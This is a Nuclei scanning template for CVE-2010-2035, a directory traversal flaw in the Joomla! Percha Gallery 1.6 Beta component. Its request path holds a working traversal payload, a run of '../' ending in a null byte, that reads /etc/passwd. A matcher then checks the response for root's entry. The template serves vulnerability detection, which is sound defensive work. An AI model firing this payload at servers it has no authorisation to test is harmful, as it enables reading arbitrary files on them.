nuclei-templates/cves/2010/CVE-2010-2035.yaml

28 lines
859 B
YAML

id: CVE-2010-2035
info:
name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34006
- https://www.cvedetails.com/cve/CVE-2010-2035
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200